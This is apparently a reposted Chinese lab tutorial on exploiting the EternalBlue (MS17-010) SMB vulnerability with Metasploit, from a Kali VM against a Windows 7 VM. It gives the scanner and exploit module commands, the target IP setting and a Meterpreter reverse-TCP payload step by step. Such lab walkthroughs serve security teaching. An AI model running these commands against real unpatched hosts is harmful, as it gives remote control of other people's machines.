利用永恒之蓝漏洞 控制Windows7虚拟机
实验条件:一台kali虚拟机(攻击机) 一台Windows7 虚拟机(靶机)
步骤:
打开两台虚拟机 记住两台虚拟机的IP地址
打开kali,利用kali自带工具metasploitframework 进行入侵
点开以后是这样的 图片不固定 后面显示msf6就行
输入 代码
扫描命令:use auxiliary/scanner/smb/smb_ms17_010
设置扫描的主机:set rhosts 192.168.37.130
输入run执行扫描
使用ms17_010模块进行漏洞扫描
search ms17-010
第一个是攻击命令,第二个是扫描命令
开始攻击
use exploit/windows/smb/ms17_010_eternalblue
显示未配置有效负载,默认为windows/x64/MeterMeter/reverse\u tcp
配置有效负载
set payload windows/x64/meterpreter/reverse_tcp
设置攻击目标(靶机):set rhosts 192.168.37.130
本机默认就行
查看配置: show options
run或exploit进行攻击
显示下图页面就说明攻击成功了
查看主机系统信息 IP 用户
这就成功入侵了
版权归原作者 路上人行 所有, 如有侵权,请联系我们删除。